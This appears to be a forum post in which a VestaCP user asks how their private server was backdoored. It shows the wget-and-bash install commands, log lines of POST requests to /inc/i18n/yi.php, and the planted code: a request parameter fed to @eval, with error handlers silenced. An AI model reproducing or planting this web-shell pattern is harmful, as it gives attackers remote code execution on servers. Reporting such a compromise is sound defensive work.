wget http://c.myvestacp.com/vst-install-debian.sh
sudo bash vst-install-debian.sh
-------
My server have private IP, no any project (just clean server with installed vesta) and non-standart vesta port.
After ~10-15 hours somebody try access to vestacp file /inc/i18n/yi.php and have 404 error:
POST /inc/i18n/yi.php HTTP/1.1 "404" 1254 "-" "-" "-"
After 4 days sombody again access to /inc/i18n/yi.php with 200 OK
POST /inc/i18n/yi.php HTTP/1.1 "200" 110 "-" "-" "-"
When im checked this file, they have backdoor:
Code: Select all
$vcp_yi_fmt = $_REQUEST['vcp_yi_fmt'];
set_error_handler(function($severity, $message, $file, $line) {
return true;
});
set_exception_handler(function($exception) {
return true;
});
//...
'Licence Deactivated' => @eval($vcp_yi_fmt),
//...
I want to know - how hackers found my server IP, they is private and don't have any public domains, 80/443 ports is hidden, only im know about installed vesta on this IP. And vesta have is non-standart port...
Where could this backdoor have come from?